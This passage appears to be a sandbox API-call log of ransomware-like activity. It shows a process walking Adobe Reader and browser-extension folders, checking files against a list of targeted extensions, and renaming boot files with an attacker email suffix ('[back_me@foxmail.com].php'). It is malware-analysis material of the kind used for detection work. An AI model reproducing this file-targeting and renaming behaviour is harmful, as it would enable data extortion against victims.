ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_SLV", cAlternateFileName="")) returned 1 [0048.919] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.920] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.920] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.SLV", cAlternateFileName="")) returned 1 [0048.920] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.920] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.920] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_TUR", cAlternateFileName="")) returned 1 [0048.920] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.920] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.920] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.TUR", cAlternateFileName="")) returned 1 [0048.921] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.921] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.921] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_UKR", cAlternateFileName="")) returned 1 [0048.921] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\*", lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0048.921] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.921] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352eb9c | out: lpFindFileData=0x352eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash.UKR", cAlternateFileName="")) returned 1 [0048.921] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0048.921] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0048.921] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP_UKR", cAlternateFileName="")) returned 0 [0048.922] FindClose (in: hFindFile=0x4232318 | out: hFindFile=0x4232318) returned 1 [0048.922] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0048.922] FindNextFileW (in: hFindFile=0x4232258, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d63ebe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x174c63, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.api", cAlternateFileName="MULTIM~1.API")) returned 1 [0048.922] FindClose (in: hFindFile=0x4232258 | out: hFindFile=0x4232258) returned 1 [0048.922] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0048.926] FindNextFileW (in: hFindFile=0x42321d8, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dc322e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins3d", cAlternateFileName="PLUG_I~1")) returned 1 [0048.926] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\*", lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dc322e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232258 [0048.926] FindNextFileW (in: hFindFile=0x4232258, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dc322e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.926] FindNextFileW (in: hFindFile=0x4232258, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc0c180, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x86988, dwReserved0=0x0, dwReserved1=0x0, cFileName="2d.x3d", cAlternateFileName="")) returned 1 [0048.927] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\*", lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dbbfec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dbbfec0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232318 [0048.927] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dbbfec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dbbfec0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.927] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dbbfec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x131c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyriadCAD.otf", cAlternateFileName="MYRIAD~1.OTF")) returned 1 [0048.927] FindClose (in: hFindFile=0x4232318 | out: hFindFile=0x4232318) returned 1 [0048.927] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0048.927] FindNextFileW (in: hFindFile=0x4232258, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc58440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x301190, dwReserved0=0x0, dwReserved1=0x0, cFileName="prcr.x3d", cAlternateFileName="")) returned 1 [0048.927] FindClose (in: hFindFile=0x4232258 | out: hFindFile=0x4232258) returned 1 [0048.927] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0048.927] FindNextFileW (in: hFindFile=0x42321d8, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="pmd.cer", cAlternateFileName="")) returned 1 [0056.932] FindNextFileW (in: hFindFile=0x42326d8, lpFindFileData=0x352e1ac | out: lpFindFileData=0x352e1ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0056.932] FindNextFileW (in: hFindFile=0x42326d8, lpFindFileData=0x352e1ac | out: lpFindFileData=0x352e1ac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0056.939] FindNextFileW (in: hFindFile=0x4232718, lpFindFileData=0x352df30 | out: lpFindFileData=0x352df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.939] FindNextFileW (in: hFindFile=0x4232718, lpFindFileData=0x352df30 | out: lpFindFileData=0x352df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0056.939] FindNextFileW (in: hFindFile=0x4232758, lpFindFileData=0x352dcb4 | out: lpFindFileData=0x352dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.940] FindNextFileW (in: hFindFile=0x4232758, lpFindFileData=0x352dcb4 | out: lpFindFileData=0x352dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 Thread: id = 16 os_tid = 0x9b8 [0034.892] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2ed10a0 [0034.892] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2ee10a8 [0034.892] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8038 [0034.893] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xbf8d58 [0034.893] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8050 [0034.893] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x3fb0020 [0034.893] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8068 [0034.893] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba8068, Size=0x20) returned 0xb902c0 [0034.893] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8068 [0034.893] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba8068, Size=0x20) returned 0xb90270 [0034.893] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.893] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.893] Wow64DisableWow64FsRedirection (in: OldValue=0x366ff58 | out: OldValue=0x366ff58*=0x0) returned 1 [0034.893] lstrlenW (lpString="kernel32.dll") returned 12 [0034.893] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb902c0 | out: hHeap=0xb10000) returned 1 [0034.893] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.893] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90270 | out: hHeap=0xb10000) returned 1 [0034.894] Sleep (dwMilliseconds=0x64) [0035.249] lstrcmpiW (lpString1=".ttf", lpString2=".php") returned 1 [0035.249] lstrlenW (lpString="kor_boot.ttf") returned 12 [0035.249] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.467] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=2371360) returned 1 [0035.467] CloseHandle (hObject=0x1a8) returned 1 [0035.467] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0035.467] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.467] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0035.467] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.467] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.467] lstrlenW (lpString=".doc") returned 4 [0035.467] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.467] lstrlenW (lpString=".docx") returned 5 [0035.467] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.467] lstrlenW (lpString=".pdf") returned 4 [0035.467] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.467] lstrlenW (lpString=".xls") returned 4 [0035.467] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.467] lstrlenW (lpString=".xlsx") returned 5 [0035.467] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.467] lstrlenW (lpString=".ppt") returned 4 [0035.467] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.467] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.467] lstrlenW (lpString=".zip") returned 4 [0035.467] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.467] lstrlenW (lpString=".rar") returned 4 [0035.468] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString=".bz2") returned 4 [0035.468] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString=".7z") returned 3 [0035.468] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.468] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.468] lstrlenW (lpString=".dbf") returned 4 [0035.468] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.468] lstrlenW (lpString=".1cd") returned 4 [0035.468] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.468] lstrlenW (lpString=".jpg") returned 4 [0035.468] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.468] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.468] lstrlenW (lpString=".doc") returned 4 [0035.468] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString=".docx") returned 5 [0035.468] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.468] lstrlenW (lpString=".pdf") returned 4 [0035.468] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString=".xls") returned 4 [0035.468] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.468] lstrlenW (lpString=".xlsx") returned 5 [0035.468] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.468] lstrlenW (lpString=".ppt") returned 4 [0035.468] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.468] lstrlenW (lpString=".zip") returned 4 [0035.468] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.468] lstrlenW (lpString=".rar") returned 4 [0035.468] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.468] lstrlenW (lpString=".bz2") returned 4 [0035.469] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.469] lstrlenW (lpString=".7z") returned 3 [0035.469] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.469] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.469] lstrlenW (lpString=".dbf") returned 4 [0035.469] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.469] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.469] lstrlenW (lpString=".1cd") returned 4 [0035.469] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.469] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.469] lstrlenW (lpString=".jpg") returned 4 [0035.469] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.469] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.469] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.469] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.469] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=93248) returned 1 [0035.469] CloseHandle (hObject=0x1a8) returned 1 [0035.469] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0035.469] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.469] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.470] lstrlenW (lpString=".doc") returned 4 [0035.470] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.470] lstrlenW (lpString=".docx") returned 5 [0035.470] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.470] 